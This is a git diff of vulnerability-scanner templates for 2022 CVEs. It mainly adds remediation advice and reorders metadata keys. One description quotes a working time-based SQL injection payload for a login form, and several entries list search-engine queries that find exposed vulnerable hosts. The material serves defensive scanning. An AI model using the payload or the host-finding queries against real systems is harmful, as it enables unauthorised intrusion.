a/http/cves/2022/CVE-2022-24266.yaml b/http/cves/2022/CVE-2022-24266.yaml index 6680dfb397..20fa124c69 100644 --- a/http/cves/2022/CVE-2022-24266.yaml +++ b/http/cves/2022/CVE-2022-24266.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Cuppa CMS v1.0 was discovered to contain a SQL injection vulnerability in /administrator/components/table_manager/ via the order_by parameter. + remediation: | + Upgrade to the latest version of Cuppa CMS or apply the provided patch to fix the SQL injection vulnerability. reference: - https://github.com/CuppaCMS/CuppaCMS - https://nvd.nist.gov/vuln/detail/CVE-2022-24266 @@ -17,11 +19,11 @@ info: cve-id: CVE-2022-24266 cwe-id: CWE-89 epss-score: 0.04372 - cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* epss-percentile: 0.91286 + cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: - max-request: 2 verified: true + max-request: 2 vendor: cuppacms product: cuppacms tags: cve,cve2022,sqli,cuppa,authenticated diff --git a/http/cves/2022/CVE-2022-24288.yaml b/http/cves/2022/CVE-2022-24288.yaml index 64ddfdd688..739b46bcdb 100644 --- a/http/cves/2022/CVE-2022-24288.yaml +++ b/http/cves/2022/CVE-2022-24288.yaml @@ -5,6 +5,8 @@ info: author: xeldax severity: high description: Apache Airflow prior to version 2.2.4 is vulnerable to OS command injection attacks because some example DAGs do not properly sanitize user-provided parameters, making them susceptible to OS Command Injection from the web UI. + remediation: | + Apply the latest security patches or upgrade to a patched version of Apache Airflow. reference: - https://github.com/advisories/GHSA-3v7g-4pg3-7r6j - https://nvd.nist.gov/vuln/detail/CVE-2022-24288 @@ -15,14 +17,14 @@ info: cve-id: CVE-2022-24288 cwe-id: CWE-78 epss-score: 0.88109 - cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:* epss-percentile: 0.98246 + cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:* metadata: - max-request: 2 verified: true - shodan-query: title:"Airflow - DAGs" || http.html:"Apache Airflow" + max-request: 2 vendor: apache product: airflow + shodan-query: title:"Airflow - DAGs" || http.html:"Apache Airflow" tags: cve,cve2022,airflow,rce http: diff --git a/http/cves/2022/CVE-2022-24384.yaml b/http/cves/2022/CVE-2022-24384.yaml index 09e80f7ceb..b91a179cef 100644 --- a/http/cves/2022/CVE-2022-24384.yaml +++ b/http/cves/2022/CVE-2022-24384.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Cross-site Scripting (XSS) vulnerability in SmarterTools SmarterTrack This issue affects: SmarterTools SmarterTrack 100.0.8019.14010. + remediation: | + Apply the latest security patches or updates provided by SmarterTools to fix this vulnerability. reference: - https://csirt.divd.nl/CVE-2022-24384 - https://csirt.divd.nl/DIVD-2021-00029 @@ -15,14 +17,14 @@ info: cve-id: CVE-2022-24384 cwe-id: CWE-79 epss-score: 0.0012 - cpe: cpe:2.3:a:smartertools:smartertrack:*:*:*:*:*:*:*:* epss-percentile: 0.45411 + cpe: cpe:2.3:a:smartertools:smartertrack:*:*:*:*:*:*:*:* metadata: + verified: true max-request: 1 + vendor: smartertools product: smartertrack shodan-query: http.favicon.hash:1410071322 - vendor: smartertools - verified: true tags: cve,cve2022,xss,smartertrack http: diff --git a/http/cves/2022/CVE-2022-2462.yaml b/http/cves/2022/CVE-2022-2462.yaml index da49ad6098..140b5e988e 100644 --- a/http/cves/2022/CVE-2022-2462.yaml +++ b/http/cves/2022/CVE-2022-2462.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Transposh plugin through is susceptible to information disclosure via the AJAX action tp_history, which is intended to return data about who has translated a text given by the token parameter. However, the plugin also returns the user's login name as part of the user_login attribute. If an anonymous user submits the translation, the user's IP address is returned. An attacker can leak the WordPress username of translators and potentially execute other unauthorized operations. + remediation: | + Upgrade to the latest version of the WordPress Transposh plugin (>=1.0.8.2) to mitigate this vulnerability. reference: - https://packetstormsecurity.com/files/167878/wptransposh1081-disclose.txt - https://github.com/oferwald/transposh @@ -18,13 +20,13 @@ info: cve-id: CVE-2022-2462 cwe-id: CWE-200 epss-score: 0.00881 - cpe: cpe:2.3:a:transposh:transposh_wordpress_translation:*:*:*:*:*:wordpress:*:* epss-percentile: 0.80428 + cpe: cpe:2.3:a:transposh:transposh_wordpress_translation:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: transposh product: transposh_wordpress_translation + framework: wordpress tags: cve,cve2022,wordpress,disclosure,wp-plugin,packetstorm http: diff --git a/http/cves/2022/CVE-2022-2467.yaml b/http/cves/2022/CVE-2022-2467.yaml index 4dfa12663c..2085cd680e 100644 --- a/http/cves/2022/CVE-2022-2467.yaml +++ b/http/cves/2022/CVE-2022-2467.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Garage Management System 1.0 contains a SQL injection vulnerability in /login.php via manipulation of the argument username with input 1@a.com' AND (SELECT 6427 FROM (SELECT(SLEEP(5)))LwLu) AND 'hsvT'='hsvT. An attacker can possibly obtain sensitive information from a database, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + remediation: | + Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Garage Management System 1.0. reference: - https://github.com/xiahao90/CVEproject/blob/main/xiahao.webray.com.cn/Garage-Management-System.md - https://www.sourcecodester.com/php/15485/garage-management-system-using-phpmysql-source-code.html @@ -16,11 +18,11 @@ info: cve-id: CVE-2022-2467 cwe-id: CWE-89 epss-score: 0.01423 - cpe: cpe:2.3:a:garage_management_system_project:garage_management_system:1.0:*:*:*:*:*:*:* epss-percentile: 0.84857 + cpe: cpe:2.3:a:garage_management_system_project:garage_management_system:1.0:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true + max-request: 1 vendor: garage_management_system_project product: garage_management_system tags: cve,cve2022,sourcecodester,garagemanagementsystem,sqli diff --git a/http/cves/2022/CVE-2022-24681.yaml b/http/cves/2022/CVE-2022-24681.yaml index 387bceae69..0bdac27064 100644 --- a/http/cves/2022/CVE-2022-24681.yaml +++ b/http/cves/2022/CVE-2022-24681.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | ManageEngine ADSelfService Plus before 6121 contains a stored cross-site scripting vulnerability via the welcome name attribute to the Reset Password, Unlock Account, or User Must Change Password screens. + remediation: | + Upgrade to a version of ManageEngine ADSelfService Plus that is higher than 6121 to mitigate this vulnerability. reference: - https://raxis.com/blog/cve-2022-24681 - https://www.manageengine.com/products/self-service-password/advisory/CVE-2022-24681.html @@ -18,8 +20,8 @@ info: cve-id: CVE-2022-24681 cwe-id: CWE-79 epss-score: 0.0017 - cpe: cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:*:*:*:*:*:*:*:* epss-percentile: 0.53409 + cpe: cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: zohocorp diff --git a/http/cves/2022/CVE-2022-24716.yaml b/http/cves/2022/CVE-2022-24716.yaml index 3205702239..b3da1f1325 100644 --- a/http/cves/2022/CVE-2022-24716.yaml +++ b/http/cves/2022/CVE-2022-24716.yaml @@ -6,26 +6,26 @@ info: severity: high description: | Icinga Web 2 is an open source monitoring web interface, framework and command-line interface. Unauthenticated users can leak the contents of files of the local system accessible to the web-server user, including `icingaweb2` configuration files with database credentials. + remediation: This issue has been resolved in versions 2.9.6 and 2.10 of Icinga Web 2. Database credentials should be rotated. reference: - https://github.com/JacobEbben/CVE-2022-24716/blob/main/exploit.py - http://packetstormsecurity.com/files/171774/Icinga-Web-2.10-Arbitrary-File-Disclosure.html - https://github.com/Icinga/icingaweb2/commit/9931ed799650f5b8d5e1dc58ea3415a4cdc5773d - https://github.com/Icinga/icingaweb2/security/advisories/GHSA-5p3f-rh28-8frw - https://security.gentoo.org/glsa/202208-05 - remediation: This issue has been resolved in versions 2.9.6 and 2.10 of Icinga Web 2. Database credentials should be rotated. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-24716 cwe-id: CWE-22 epss-score: 0.33311 - cpe: cpe:2.3:a:icinga:icinga_web_2:*:*:*:*:*:*:*:* epss-percentile: 0.96475 + cpe: cpe:2.3:a:icinga:icinga_web_2:*:*:*:*:*:*:*:* metadata: max-request: 3 - shodan-query: title:"Icinga" vendor: icinga product: icinga_web_2 + shodan-query: title:"Icinga" tags: packetstorm,cve,cve2023,icinga,lfi http: diff --git a/http/cves/2022/CVE-2022-24816.yaml b/http/cves/2022/CVE-2022-24816.yaml index 33dfa17183..ca453a3fb0 100644 --- a/http/cves/2022/CVE-2022-24816.yaml +++ b/http/cves/2022/CVE-2022-24816.yaml @@ -6,27 +6,27 @@ info: severity: critical description: | Programs run on GeoServer before 1.2.2 which use jt-jiffle and allow Jiffle script to be provided via network request are susceptible to remote code execution. The Jiffle script is compiled into Java code via Janino, and executed. In particular, this affects downstream GeoServer 1.1.22. + remediation: 1.2.22 contains a patch that disables the ability to inject malicious code into the resulting script. Users unable to upgrade may negate the ability to compile Jiffle scripts from the final application by removing janino-x.y.z.jar from the classpath. reference: - https://www.synacktiv.com/en/publications/exploiting-cve-2022-24816-a-code-injection-in-the-jt-jiffle-extension-of-geoserver.html - https://github.com/geosolutions-it/jai-ext/security/advisories/GHSA-v92f-jx6p-73rx - https://github.com/geosolutions-it/jai-ext/commit/cb1d6565d38954676b0a366da4f965fef38da1cb - https://nvd.nist.gov/vuln/detail/CVE-2022-24816 - remediation: 1.2.22 contains a patch that disables the ability to inject malicious code into the resulting script. Users unable to upgrade may negate the ability to compile Jiffle scripts from the final application by removing janino-x.y.z.jar from the classpath. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-24816 cwe-id: CWE-94 epss-score: 0.87795 - cpe: cpe:2.3:a:geosolutionsgroup:jai-ext:*:*:*:*:*:*:*:* epss-percentile: 0.98227 + cpe: cpe:2.3:a:geosolutionsgroup:jai-ext:*:*:*:*:*:*:*:* metadata: - max-request: 1 - fofa-query: app="GeoServer" - shodan-query: /geoserver/ verified: true + max-request: 1 vendor: geosolutionsgroup product: jai-ext + shodan-query: /geoserver/ + fofa-query: app="GeoServer" tags: cve,cve2022,geoserver,rce http: diff --git a/http/cves/2022/CVE-2022-24856.yaml b/http/cves/2022/CVE-2022-24856.yaml index 657d1ed329..41a8453ddb 100644 --- a/http/cves/2022/CVE-2022-24856.yaml +++ b/http/cves/2022/CVE-2022-24856.yaml @@ -6,22 +6,22 @@ info: severity: high description: | FlyteConsole is the web user interface for the Flyte platform. FlyteConsole prior to version 0.52.0 is vulnerable to server-side request forgery when FlyteConsole is open to the general internet. An attacker can exploit any user of a vulnerable instance to access the internal metadata server or other unauthenticated URLs. Passing of headers to an unauthorized actor may occur. + remediation: | + The patch for this issue deletes the entire cors_proxy, as this is no longer required for the console. A patch is available in FlyteConsole version 0.52.0, or as a work-around disable FlyteConsole. reference: - https://github.com/flyteorg/flyteconsole/security/advisories/GHSA-www6-hf2v-v9m9 - https://github.com/flyteorg/flyteconsole/pull/389 - https://hackerone.com/reports/1540906 - https://nvd.nist.gov/vuln/detail/CVE-2022-24856 - https://github.com/flyteorg/flyteconsole/commit/05b88ed2d2ecdb5d8a8404efea25414e57189709 - remediation: | - The patch for this issue deletes the entire cors_proxy, as this is no longer required for the console. A patch is available in FlyteConsole version 0.52.0, or as a work-around disable FlyteConsole. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-24856 cwe-id: CWE-918 epss-score: 0.04747 - cpe: cpe:2.3:a:flyte:flyte_console:*:*:*:*:*:*:*:* epss-percentile: 0.91616 + cpe: cpe:2.3:a:flyte:flyte_console:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: flyte diff --git a/http/cves/2022/CVE-2022-2486.yaml b/http/cves/2022/CVE-2022-2486.yaml index a44d421369..c264ef9908 100644 --- a/http/cves/2022/CVE-2022-2486.yaml +++ b/http/cves/2022/CVE-2022-2486.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Wavlink WN535K2 and WN535K3 routers are susceptible to OS command injection in an unknown part of the file /cgi-bin/mesh.cgi?page=upgrade via manipulation of the argument key. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + remediation: | + Apply the latest firmware update provided by the vendor to mitigate this vulnerability. reference: - https://github.com/1angx/webray.com.cn/blob/main/Wavlink/Wavlink%20mesh.cgi.md - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2486 @@ -17,14 +19,14 @@ info: cve-id: CVE-2022-2486 cwe-id: CWE-78 epss-score: 0.97265 - cpe: cpe:2.3:o:wavlink:wl-wn535k2_firmware:-:*:*:*:*:*:*:* epss-percentile: 0.99771 + cpe: cpe:2.3:o:wavlink:wl-wn535k2_firmware:-:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.title:"Wi-Fi APP Login" verified: true + max-request: 1 vendor: wavlink product: wl-wn535k2_firmware + shodan-query: http.title:"Wi-Fi APP Login" tags: cve,cve2022,iot,wavlink,router,rce,oast http: diff --git a/http/cves/2022/CVE-2022-2487.yaml b/http/cves/2022/CVE-2022-2487.yaml index 1e078f8fc2..dd1b572bee 100644 --- a/http/cves/2022/CVE-2022-2487.yaml +++ b/http/cves/2022/CVE-2022-2487.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Wavlink WN535K2 and WN535K3 routers are susceptible to OS command injection which affects unknown code in /cgi-bin/nightled.cgi via manipulation of the argument start_hour. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + remediation: | + Apply the latest firmware update provided by the vendor to mitigate this vulnerability. reference: - https://github.com/1angx/webray.com.cn/blob/main/Wavlink/Wavlink%20nightled.cgi%20.md - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2487 @@ -17,14 +19,14 @@ info: cve-id: CVE-2022-2487 cwe-id: CWE-78 epss-score: 0.9737 - cpe: cpe:2.3:o:wavlink:wl-wn535k2_firmware:-:*:*:*:*:*:*:* epss-percentile: 0.99849 + cpe: cpe:2.3:o:wavlink:wl-wn535k2_firmware:-:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.title:"Wi-Fi APP Login" verified: true + max-request: 1 vendor: wavlink product: wl-wn535k2_firmware + shodan-query: http.title:"Wi-Fi APP Login" tags: cve,cve2022,iot,wavlink,router,rce,oast variables: cmd: "id" diff --git a/http/cves/2022/CVE-2022-2488.yaml b/http/cves/2022/CVE-2022-2488.yaml index 3fa2b6e542..d4ea79ae06 100644 --- a/http/cves/2022/CVE-2022-2488.yaml +++ b/http/cves/2022/CVE-2022-2488.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Wavlink WN535K2 and WN535K3 routers are susceptible to OS command injection in /cgi-bin/touchlist_sync.cgi via manipulation of the argument IP. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + remediation: | + Apply the latest firmware update provided by the vendor to mitigate this vulnerability. reference: - https://github.com/1angx/webray.com.cn/blob/main/Wavlink/Wavlink%20touchlist_sync.cgi.md - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2488 @@ -17,14 +19,14 @@ info: cve-id: CVE-2022-2488 cwe-id: CWE-78 epss-score: 0.97387 - cpe: cpe:2.3:o:wavlink:wl-wn535k2_firmware:-:*:*:*:*:*:*:* epss-percentile: 0.99867 + cpe: cpe:2.3:o:wavlink:wl-wn535k2_firmware:-:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.title:"Wi-Fi APP Login" verified: true + max-request: 1 vendor: wavlink product: wl-wn535k2_firmware + shodan-query: http.title:"Wi-Fi APP Login" tags: cve,cve2022,iot,wavlink,router,rce,oast http: diff --git a/http/cves/2022/CVE-2022-24899.yaml b/http/cves/2022/CVE-2022-24899.yaml index 30dd72da18..7fb466b432 100644 --- a/http/cves/2022/CVE-2022-24899.yaml +++ b/http/cves/2022/CVE-2022-24899.yaml @@ -6,26 +6,26 @@ info: severity: medium description: | Contao prior to 4.13.3 contains a cross-site scripting vulnerability. It is possible to inject arbitrary JavaScript code into the canonical tag. + remediation: As a workaround, users may disable canonical tags in the root page settings. reference: - https://huntr.dev/bounties/df46e285-1b7f-403c-8f6c-8819e42deb80/ - https://github.com/contao/contao/security/advisories/GHSA-m8x6-6r63-qvj2 - https://nvd.nist.gov/vuln/detail/CVE-2022-24899 - https://contao.org/en/security-advisories/cross-site-scripting-via-canonical-url.html - https://github.com/contao/contao/commit/199206849a87ddd0fa5cf674eb3c58292fd8366c - remediation: As a workaround, users may disable canonical tags in the root page settings. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-24899 cwe-id: CWE-79 epss-score: 0.00303 - cpe: cpe:2.3:a:contao:contao:*:*:*:*:*:*:*:* epss-percentile: 0.65765 + cpe: cpe:2.3:a:contao:contao:*:*:*:*:*:*:*:* metadata: max-request: 1 - shodan-query: title:"Contao" vendor: contao product: contao + shodan-query: title:"Contao" tags: cve,cve2022,contao,xss,huntr http: diff --git a/http/cves/2022/CVE-2022-24900.yaml b/http/cves/2022/CVE-2022-24900.yaml index ac93cdd178..875af10712 100644 --- a/http/cves/2022/CVE-2022-24900.yaml +++ b/http/cves/2022/CVE-2022-24900.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Piano LED Visualizer 1.3 and prior are vulnerable to local file inclusion. + remediation: | + Apply the latest patch or update provided by the vendor to fix the local file inclusion vulnerability in the Piano LED Visualizer 1.3 application. reference: - https://github.com/onlaj/Piano-LED-Visualizer/issues/350 - https://vuldb.com/?id.198714 @@ -17,8 +19,8 @@ info: cve-id: CVE-2022-24900 cwe-id: CWE-668,CWE-22 epss-score: 0.01086 - cpe: cpe:2.3:a:piano_led_visualizer_project:piano_led_visualizer:*:*:*:*:*:*:*:* epss-percentile: 0.82518 + cpe: cpe:2.3:a:piano_led_visualizer_project:piano_led_visualizer:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: piano_led_visualizer_project diff --git a/http/cves/2022/CVE-2022-24990.yaml b/http/cves/2022/CVE-2022-24990.yaml index 42d665e9f8..c58bac8966 100644 --- a/http/cves/2022/CVE-2022-24990.yaml +++ b/http/cves/2022/CVE-2022-24990.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: high description: TerraMaster NAS devices running TOS prior to version 4.2.30 are vulnerable to information disclosure. + remediation: | + Upgrade the TerraMaster TOS server to version 4.2.30 or later to mitigate the vulnerability. reference: - https://octagon.net/blog/2022/03/07/cve-2022-24990-terrmaster-tos-unauthenticated-remote-command-execution-via-php-object-instantiation/ - https://www.broadcom.com/support/security-center/attacksignatures/detail?asid=33732 @@ -16,13 +18,13 @@ info: cve-id: CVE-2022-24990 cwe-id: CWE-306 epss-score: 0.96102 - cpe: cpe:2.3:o:terra-master:terramaster_operating_system:*:*:*:*:*:*:*:* epss-percentile: 0.99272 + cpe: cpe:2.3:o:terra-master:terramaster_operating_system:*:*:*:*:*:*:*:* metadata: max-request: 1 - shodan-query: "TerraMaster" vendor: terra-master product: terramaster_operating_system + shodan-query: "TerraMaster" tags: packetstorm,cve,cve2022,terramaster,exposure,kev http: diff --git a/http/cves/2022/CVE-2022-25082.yaml b/http/cves/2022/CVE-2022-25082.yaml index 7c3256f814..e0fa2cd327 100644 --- a/http/cves/2022/CVE-2022-25082.yaml +++ b/http/cves/2022/CVE-2022-25082.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | TOTOLink A950RG V5.9c.4050_B20190424 and V4.1.2cu.5204_B20210112 were discovered to contain a command injection vulnerability in the Main function. This vulnerability allows attackers to execute arbitrary commands via the QUERY_STRING parameter. + remediation: | + Apply the latest firmware update provided by the vendor to fix the command injection vulnerability. reference: - https://nvd.nist.gov/vuln/detail/cve-2022-25082 - https://github.com/EPhaha/IOT_vuln/blob/main/TOTOLink/A950RG/README.md @@ -15,8 +17,8 @@ info: cve-id: CVE-2022-25082 cwe-id: CWE-78 epss-score: 0.02673 - cpe: cpe:2.3:o:totolink:a950rg_firmware:4.1.2cu.5204_b20210112:*:*:*:*:*:*:* epss-percentile: 0.89078 + cpe: cpe:2.3:o:totolink:a950rg_firmware:4.1.2cu.5204_b20210112:*:*:*:*:*:*:* metadata: max-request: 2 vendor: totolink diff --git a/http/cves/2022/CVE-2022-25125.yaml b/http/cves/2022/CVE-2022-25125.yaml index c7e278ac23..742ac0bdcc 100644 --- a/http/cves/2022/CVE-2022-25125.yaml +++ b/http/cves/2022/CVE-2022-25125.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | MCMS 5.2.4 contains a SQL injection vulnerability via search.do in the file /mdiy/dict/listExcludeApp. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + remediation: | + Apply the latest security patches or updates provided by the vendor to fix the SQL Injection vulnerability in MCMS 5.2.4. reference: - https://github.com/ming-soft/MCMS/issues/90 - https://gitee.com/mingSoft/MCMS/issues/I4TGYI @@ -16,15 +18,15 @@ info: cve-id: CVE-2022-25125 cwe-id: CWE-89 epss-score: 0.01029 - cpe: cpe:2.3:a:mingsoft:mcms:5.2.4:*:*:*:*:*:*:* epss-percentile: 0.81996 + cpe: cpe:2.3:a:mingsoft:mcms:5.2.4:*:*:*:*:*:*:* metadata: - max-request: 1 - fofa-query: icon_hash="1464851260" - shodan-query: http.favicon.hash:1464851260 verified: true + max-request: 1 vendor: mingsoft product: mcms + shodan-query: http.favicon.hash:1464851260 + fofa-query: icon_hash="1464851260" tags: cve,cve2022,sqli,mcms variables: num: "999999999" diff --git a/http/cves/2022/CVE-2022-25216.yaml b/http/cves/2022/CVE-2022-25216.yaml index ce92fb13a6..b1c4c5efb0 100644 --- a/http/cves/2022/CVE-2022-25216.yaml +++ b/http/cves/2022/CVE-2022-25216.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: DVDFab 12 Player/PlayerFab is susceptible to local file inclusion which allows a remote attacker to download any file on the Windows file system for which the user account running DVDFab 12 Player (recently renamed PlayerFab) has read-access. + remediation: | + Apply the latest patch or update from the vendor to fix the vulnerability. reference: - https://www.tenable.com/security/research/tra-2022-07 - https://nvd.nist.gov/vuln/detail/CVE-2022-25216 @@ -14,8 +16,8 @@ info: cve-id: CVE-2022-25216 cwe-id: CWE-22 epss-score: 0.00979 - cpe: cpe:2.3:a:dvdfab:12_player:*:*:*:*:*:*:*:* epss-percentile: 0.81504 + cpe: cpe:2.3:a:dvdfab:12_player:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: dvdfab diff --git a/http/cves/2022/CVE-2022-25323.yaml b/http/cves/2022/CVE-2022-25323.yaml index 9c74749ff4..87b134376a 100644 --- a/http/cves/2022/CVE-2022-25323.yaml +++ b/http/cves/2022/CVE-2022-25323.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: ZEROF Web Server 2.0 allows /admin.back cross-site scripting. + remediation: | + Apply the latest security patches or updates provided by the vendor to fix the XSS vulnerability in ZEROF Web Server 2.0. reference: - https://github.com/awillix/research/blob/main/cve/CVE-2022-25323.md - https://nvd.nist.gov/vuln/detail/CVE-2022-25323 @@ -15,8 +17,8 @@ info: cve-id: CVE-2022-25323 cwe-id: CWE-79 epss-score: 0.00132 - cpe: cpe:2.3:a:zerof:web_server:2.0:*:*:*:*:*:*:* epss-percentile: 0.47422 + cpe: cpe:2.3:a:zerof:web_server:2.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: zerof diff --git a/http/cves/2022/CVE-2022-25356.yaml b/http/cves/2022/CVE-2022-25356.yaml index c2b3fb1659..879029043c 100644 --- a/http/cves/2022/CVE-2022-25356.yaml +++ b/http/cves/2022/CVE-2022-25356.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Alt-n/MDaemon Security Gateway through 8.5.0 is susceptible to XML injection via SecurityGateway.dll?view=login. An attacker can inject an arbitrary XML argument by adding a new parameter in the HTTP request URL. As a result, the XML parser fails the validation process and discloses information such as protection used (2FA), admin email, and product registration keys. + remediation: | + Upgrade Alt-n/MDaemon Security Gateway to version 8.5.1 or later to mitigate this vulnerability. reference: - https://www.swascan.com/security-advisory-alt-n-security-gateway/ - https://www.altn.com/Products/SecurityGateway-Email-Firewall/ @@ -17,14 +19,14 @@ info: cve-id: CVE-2022-25356 cwe-id: CWE-91 epss-score: 0.00437 - cpe: cpe:2.3:a:altn:securitygateway:*:*:*:*:*:*:*:* epss-percentile: 0.71533 + cpe: cpe:2.3:a:altn:securitygateway:*:*:*:*:*:*:*:* metadata: - max-request: 1 - google-query: inurl:"/SecurityGateway.dll" verified: true + max-request: 1 vendor: altn product: securitygateway + google-query: inurl:"/SecurityGateway.dll" tags: cve,cve2022,altn,gateway,xml,injection http: diff --git a/http/cves/2022/CVE-2022-25369.yaml b/http/cves/2022/CVE-2022-25369.yaml index aa74576b9e..852c770fe8 100644 --- a/http/cves/2022/CVE-2022-25369.yaml +++ b/http/cves/2022/CVE-2022-25369.yaml @@ -5,10 +5,10 @@ info: author: pdteam severity: critical description: Dynamicweb contains a vulnerability which allows an unauthenticated attacker to create a new administrative user. + remediation: 'Upgrade to one of the fixed versions or higher: Dynamicweb 9.5.9, 9.6.16, 9.7.8, 9.8.11, 9.9, 9.10.18, 9.12.8, or 9.13.0.' reference: - https://blog.assetnote.io/2022/02/20/logicflaw-dynamicweb-rce/ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-25369 - remediation: 'Upgrade to one of the fixed versions or higher: Dynamicweb 9.5.9, 9.6.16, 9.7.8, 9.8.11, 9.9, 9.10.18, 9.12.8, or 9.13.0.' classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 diff --git a/http/cves/2022/CVE-2022-2544.yaml b/http/cves/2022/CVE-2022-2544.yaml index e182da5f35..ec9e8097c3 100644 --- a/http/cves/2022/CVE-2022-2544.yaml +++ b/http/cves/2022/CVE-2022-2544.yaml @@ -5,6 +5,8 @@ info: author: tess severity: high description: WordPress Ninja Job Board plugin prior to 1.3.3 is susceptible to a direct request vulnerability. The plugin does not protect the directory where it stores uploaded resumes, making it vulnerable to unauthenticated directory listing which allows the download of uploaded resumes. + remediation: | + Update to the latest version of the WordPress Ninja Job Board plugin (1.3.3) to fix the vulnerability. reference: - https://plugins.trac.wordpress.org/changeset/2758420/ninja-job-board/trunk/includes/Classes/File/FileHandler.php?old=2126467&old_path=ninja-job-board%2Ftrunk%2Fincludes%2FClasses%2FFile%2FFileHandler.php - https://wpscan.com/vulnerability/a9bcc68c-eeda-4647-8463-e7e136733053 @@ -16,14 +18,14 @@ info: cve-id: CVE-2022-2544 cwe-id: CWE-425 epss-score: 0.00695 - cpe: cpe:2.3:a:wpmanageninja:ninja_job_board:*:*:*:*:*:wordpress:*:* epss-percentile: 0.77722 + cpe: cpe:2.3:a:wpmanageninja:ninja_job_board:*:*:*:*:*:wordpress:*:* metadata: - max-request: 2 verified: true - framework: wordpress + max-request: 2 vendor: wpmanageninja product: ninja_job_board + framework: wordpress tags: ninja,exposure,wpscan,cve,cve2022,wordpress,wp-plugin,wp http: diff --git a/http/cves/2022/CVE-2022-2546.yaml b/http/cves/2022/CVE-2022-2546.yaml index 7ec42c5239..2b38bc2f86 100644 --- a/http/cves/2022/CVE-2022-2546.yaml +++ b/http/cves/2022/CVE-2022-2546.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress All-in-One WP Migration plugin 7.62 and prior contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Update to the latest version of the WordPress All-in-One WP Migration plugin (7.63 or higher) to mitigate this vulnerability. reference: - https://wpscan.com/vulnerability/f84920e4-a1fe-47cf-9ba5-731989c70f58 - https://wordpress.org/plugins/all-in-one-wp-migration/ @@ -17,14 +19,14 @@ info: cve-id: CVE-2022-2546 cwe-id: CWE-79 epss-score: 0.00091 - cpe: cpe:2.3:a:servmask:all-in-one_wp_migration:*:*:*:*:*:wordpress:*:* epss-percentile: 0.38082 + cpe: cpe:2.3:a:servmask:all-in-one_wp_migration:*:*:*:*:*:wordpress:*:* metadata: - max-request: 3 verified: true - framework: wordpress + max-request: 3 vendor: servmask product: all-in-one_wp_migration + framework: wordpress tags: cve,all-in-one-wp-migration,authenticated,wpscan,cve2022,wordpress,wp-plugin,wp,xss http: diff --git a/http/cves/2022/CVE-2022-25481.yaml b/http/cves/2022/CVE-2022-25481.yaml index b03853fbdd..95d0ac2445 100644 --- a/http/cves/2022/CVE-2022-25481.yaml +++ b/http/cves/2022/CVE-2022-25481.yaml @@ -6,6 +6,8 @@ info: severity: high description: | ThinkPHP 5.0.24 is susceptible to information disclosure. This version was configured without the PATHINFO parameter. This can allow an attacker to access all system environment parameters from index.php, thereby possibly obtaining sensitive information, modifying data, and/or executing unauthorized operations. + remediation: | + Upgrade to a patched version of ThinkPHP or apply the necessary security patches. reference: - https://github.com/Lyther/VulnDiscover/blob/master/Web/ThinkPHP_InfoLeak.md - https://nvd.nist.gov/vuln/detail/CVE-2022-25481 @@ -15,14 +17,14 @@ info: cve-id: CVE-2022-25481 cwe-id: CWE-668 epss-score: 0.00892 - cpe: cpe:2.3:a:thinkphp:thinkphp:5.0.24:*:*:*:*:*:*:* 